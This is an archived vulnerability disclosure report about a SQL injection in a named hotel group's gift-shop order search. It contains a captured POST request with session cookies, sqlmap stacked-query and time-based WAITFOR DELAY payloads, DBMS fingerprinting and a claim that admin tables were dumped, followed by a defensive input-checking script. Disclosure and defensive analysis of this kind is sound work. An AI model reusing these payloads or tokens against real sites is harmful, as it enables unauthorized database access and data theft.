WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-05-04: Details sent to the vendor, awaiting the vendor's handling
2015-05-04: Vendor has confirmed; details disclosed to the vendor only
2015-05-14: Details disclosed to core white hats and experts in the relevant field
2015-05-24: Details disclosed to regular white hats
2015-06-03: Details disclosed to intern white hats
2015-06-18: Details disclosed to the public
A rather painful injection
http://mygifts.plateno.com/PersonalCenter/MyOrderList.aspx is their gift shop. Reviewers, note that this injection is a POST injection:
POST /PersonalCenter/MyOrderList.aspx HTTP/1.1
Host: mygifts.plateno.com
Proxy-Connection: keep-alive
Content-Length: 1360
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://mygifts.plateno.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://mygifts.plateno.com/PersonalCenter/MyOrderList.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: utag_main=v_id:014cbd87f7ac00235f3fee2e4bf01f065001c05d00876$_sn:1$_ss:0$_pn:2%3Bexp-session$_st:1429110765616$ses_id:1429108946860%3Bexp-session; bkng=11UmFuZG9tSVYkc2RlIyh9YWJdm48m5cJDWuLLIYaigN4h6aMhDfebFAqaoHzvpqNNoh%2BYtJvK5BkSZZhc7fq019lkUxgRJHU3ugt%2FSlOlBzwLB8JK1RXYh1OOmqUu1J3E5ID%2FOyDp%2Br%2BXDHGSSsxnXiCW%2FtMkD%2BsCyQ8q0YWEa9j3GxeUyihfg2TuI3NMuPRczR%2BPJumPvuk%3D; user=103137794%7C5; loginStatus=2015%2F04%2F28%2001%3A00%3A18%7Ctrue; Hm_lvt_39cd07a8ec3f1a319296c92d8a2f25c8=1430197102,1430197167,1430197199,1430199215; Hm_lpvt_39cd07a8ec3f1a319296c92d8a2f25c8=1430199404; ASP.NET_SessionId=canjwr55dxivbqfb21rdtoyv; CheckCode=660F; s_cc=true; svid=BDB8E2029D61E5DA; s_sq=plateno-prd%3D%2526pid%253Dmygifts.plateno.com%25252FDefault.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmygifts.plateno.com%25252FLogin.aspx%2526ot%253DA; url=/PersonalCenter/MyOrderList.aspx; .ASPXAUTH=6FDD224E42B399990B3F65E9C006CD85F166EA0AAB3D0AD3AC485485ABB567727025FC062E57F17D94398A0F5F4D9D5A25C955526760DE273FB141D7687099C7534DB34A585B72CDC0ADF7CA7ACA6D2E6DDDCF3FDA6493458FECE475B43C27B8EBC1671BA20244459BBDC70399A25896031562C3; CNZZDATA1253955047=486448934-1428939919-http%253A%252F%252Ffofa.so%252F%7C1430222980

__EVENTTARGET=lbtnSearch&__EVENTARGUMENT=&__VIEWSTATE=soVAJyOHH7hzDL%2BNRpmUPrnCD%2FSNR2KqJkCOTFC%2B2Tlu%2FrS%2FkjWTlA%2BC4HLALZkAkhe%2Bn2I2tKJr2pl0La0gfHoWRaM%2B2xTUcjJTe3ImuinoM6sgV8RWQt0QsOCk%2BJ4mCLRO%2BropVC8YU0ni3Bi77Bi8BIgCrmn2xnxQ7GCpI%2FBmPFcTzbRGqOFljMZlghKKg%2BdMIP101nvUP54XSmAQuorOzh6DR0aE8adu0nN%2B4qBGhjRoM7smHzWjmp6xjZ6r%2BJHv6B3B9TEZSyKjPoF1g5Z8hV8%2FSUg5%2FV%2FuaOqsHLBYuzfEThxwWQHcbdNfTQ0v5HzShhE0HEYit4%2BpktuENZck%2BJ%2Bn0wP4UkuBudNHBdY0L10dxnvdA2Cvgd5Hq53KhixWqZCGkWPqKOuDyQKveVX6TYZSHKtEGb%2F2y6Zs4gFv%2Bkt5rcvIFGpWcF93eI9Ui9%2BZSEHnxhTD3UGh8B9zah5V82dLrsjlzcHmTzY%2B6cQLp4RVCLWInKUZMwkxw2as%2BcNwTy9f3jpdY5lC%2Bw3n6Rv44wAOgWkeF%2B6AlBTvPhm533uy4lpEnxVKPfDYLiYTQsc0I9pSoJUVlhK%2BiNdXTMXgDXXaAjqYX6X%2FRFy0%2BXkv53o3l40CkOSWZh%2BvNEoFMasxGXVam3i6V%2BoXrF8%2B2IOtPYstxGb36hv0Vh9qweLSoSxB%2BnGbfmLoQPJhwqCjdHykn1dWQrUOvCHP9tmId1Kzx7CQtpg%2Bgy9eV9UWfEofDuybyTdz1ciPi%2BnNSsHUCLTDB4Hu4SXOEZzIIkqA8Lgrr0ewnU%2B2u%2FlAEsLiEx6z77oOpMDb6FTGiZD9owFcAWXLcHQOe2Sw8DXxxoUyLAKdbz1iFvp42mRDSAbE5DVw53k17MhCwBtDvI0%2BZebuwzEv7U8x2Cn7X9X08DdVbBZV94k%3D&__EVENTVALIDATION=uCu2e2tjF4nprAv8XEu9DGyJNjfM7vZdzWj0Oo4seZyTh20ypkJF2D3Zol%2F0GYfj3nA1Bn9CaXyUkRRUo4QkEiBBEkR049t8pMEUXIHuNRpFRmp9LN0%2BVUiG1GppQfNvAk%2Bu2j%2FNNlCfon3Olrn7aRK2MZQEQwClQ4FthSMsoM8sejSJyqSQsUxV0gM%3D&txtOrderNo=111&txtGoodsName=54645&txtTime1=2015-04-01&txtTime2=2015-04-09&ddlState=0
Injection type:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: txtOrderNo (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=lbtnSearch&__EVENTARGUMENT=&__VIEWSTATE=[...]&__EVENTVALIDATION=cnvD41ZFVOnC1hhnLJk0NEaxRpNfGZ0XdKcpqOasrUBhQMBiZDkiw3ncE9aHM+wx2XeNxCg8OHtWAFnVhGyGAhxYr/QYeIZATGrCMex+sJasIoIS1069vP/7NaJhABjjM7mJZ9upH2moz6zEW6V/2Ubc2K/805osrkRba05FMupb7a9jsRVfdyqSFf8=&txtOrderNo=111'; WAITFOR DELAY '0:0:5'--&txtGoodsName=1&txtTime1=2015-04-08&txtTime2=2015-04-08&ddlState=0

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=lbtnSearch&__EVENTARGUMENT=&__VIEWSTATE=7GR6HbtkNjBe9X/ScMAoWH2ytuTYsmxi1VMl7AT/hSkar2k0vYzzjCbqUdtlAU4Zl71xYE7Xi76XzOVXhfvz06LhJzLrquOEgG1ZeCkOXvRsUWlj4BJZWQdtTQwhoqH4M6vM62GDJDtywySLDQVg3FEBq0rcUGZM+jFfy5BJcw8TDoNjaQ5WqbCUlvN26iwBW9VV56z6YMImXgX1LjbJfcOvmfhxgS+wAWbFizqE2pk6oXHMhp98zaSsfVkXH71D6nQ/9evyuhIlBXONlQ7BHLmtsEcJ/VbhcVwsfHCfYn45ElWXUlFthXlnWb5HAUrrXPXqx69HPHo7U761ysqJRtCobh9Vo37F93oxTKDKXzeAsEFo9kATi8TcROdszR9G3q6BQvPkFi/Q9a/bCKviGANDQnxgnpcVLgDg6C8FM8rmo3Mr7dEO392Gq0fHhHtvI1Wu9TLO2Zwud2oG8hAcLZmXSNcv6L7y/jCfXogLw3ss+lrpCLenlAGHnecdaFGKLkopvICGirIhVbjffQQ8/1jX6959Penc+q/SSTN9wAiws8VIOvbVQGMhkaK3fUrVjYMgKIkC2UNHjgQ6jnb0jC5tfZJNpsl3NGBw8OTdUasGwtki9J9u7JIEz2J/vXT8qEKVodS14GNt5hk2/mx/8bNLW+WzgWk8rd4ZB6ClAu26B3mfZNrXqq6CgZQ8bG86YjAFEdrVJaTk5P54rxJZfeY+SkTG26D51K3JxHkIJoNebRRZREtgTy+eENh6gVHvG5MCOPMb0b/e3fjX+9Hkn4tlKkLojNiWMUkh/GoSCxg6VGaX5NZOCRgDN6h3ZSixKdBouLE8x6zw1R8WttiNyxskAmu6MCeCHx2qfgdCbEB6C0r7Foi4IexREVCD8NVdtgbQdWn9E4fj/JRK&__EVENTVALIDATION=cnvD41ZFVOnC1hhnLJk0NEaxRpNfGZ0XdKcpqOasrUBhQMBiZDkiw3ncE9aHM+wx2XeNxCg8OHtWAFnVhGyGAhxYr/QYeIZATGrCMex+sJasIoIS1069vP/7NaJhABjjM7mJZ9upH2moz6zEW6V/2Ubc2K/805osrkRba05FMupb7a9jsRVfdyqSFf8=&txtOrderNo=111' WAITFOR DELAY '0:0:5'--&txtGoodsName=1&txtTime1=2015-04-08&txtTime2=2015-04-08&ddlState=0
---
[21:34:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[21:34:09] [INFO] fetching columns for table 'Admin' in database 'jfsc'
After that it was a matter of dumping the tables: the admin table and so on.
The connection was slow; it ran for half a day and was still going... Everyone take note: if this appears:
you have to capture the request again. Their cookies have a time limit, and after a while you have to log in again.
Filter the input.
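As an added illustration of the "filter" fix, and not code from the report or the site: the check below inspects a MyOrderList.aspx POST body, rejecting any search field that does not match its expected shape and tagging the two txtOrderNo payload patterns sqlmap reported (MSSQL WAITFOR DELAY time-based blind and stacked queries). The per-field rules are assumptions derived from the captured request; the real fix is to pass the validated values to a parameterized query rather than concatenating them into SQL.

```python
import re
from urllib.parse import unquote_plus

# Expected shape of each search field (assumed from the captured request:
# numeric order number, YYYY-MM-DD dates, small integer state).
FIELD_RULES = {
    "txtOrderNo": re.compile(r"\d{1,20}"),
    "txtGoodsName": re.compile(r"[\w ]{0,50}"),
    "txtTime1": re.compile(r"\d{4}-\d{2}-\d{2}"),
    "txtTime2": re.compile(r"\d{4}-\d{2}-\d{2}"),
    "ddlState": re.compile(r"\d{1,2}"),
}
# Signatures of the two techniques sqlmap reported against txtOrderNo.
MSSQL_TIME_BASED = re.compile(r"WAITFOR\s+DELAY\s+'[\d:]+'", re.IGNORECASE)
STACKED_QUERY = re.compile(r"'\s*;")


def parse_form_body(body: str) -> dict:
    """Split a form-urlencoded body on '&' only, so a ';' inside a value
    (as in the stacked payload) stays part of that value."""
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields


def inspect_form_body(body: str) -> dict:
    """Return {field: [tags]} for fields failing their rule or carrying a
    known signature; an empty dict means the body may go to a parameterized query."""
    fields = parse_form_body(body)
    problems = {}
    for name, rule in FIELD_RULES.items():
        value = fields.get(name, "")
        tags = []
        if not rule.fullmatch(value):
            tags.append("schema-violation")
        if MSSQL_TIME_BASED.search(value):
            tags.append("mssql-time-based")
        if STACKED_QUERY.search(value):
            tags.append("stacked-query")
        if tags:
            problems[name] = tags
    return problems


# Constructed sample bodies: a normal search plus the two sqlmap payloads
# (__VIEWSTATE/__EVENTVALIDATION omitted; they are not inspected).
NORMAL = ("__EVENTTARGET=lbtnSearch&txtOrderNo=111&txtGoodsName=54645"
          "&txtTime1=2015-04-01&txtTime2=2015-04-09&ddlState=0")
STACKED = ("__EVENTTARGET=lbtnSearch&txtOrderNo=111'; WAITFOR DELAY '0:0:5'--"
           "&txtGoodsName=1&txtTime1=2015-04-08&txtTime2=2015-04-08&ddlState=0")
TIMED = ("__EVENTTARGET=lbtnSearch&txtOrderNo=111' WAITFOR DELAY '0:0:5'--"
         "&txtGoodsName=1&txtTime1=2015-04-08&txtTime2=2015-04-08&ddlState=0")
```

Run `inspect_form_body` over the three bodies: the normal search yields no findings, while both payloads fail the numeric order-number rule before any signature matching is even needed.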
Severity: High
Vulnerability Rank: 12
Confirmed at: 2015-05-04 15:58
The reporter is impressive. Fortunately this site is isolated, but it also led us to discover another problem at the same time. Many thanks.
None yet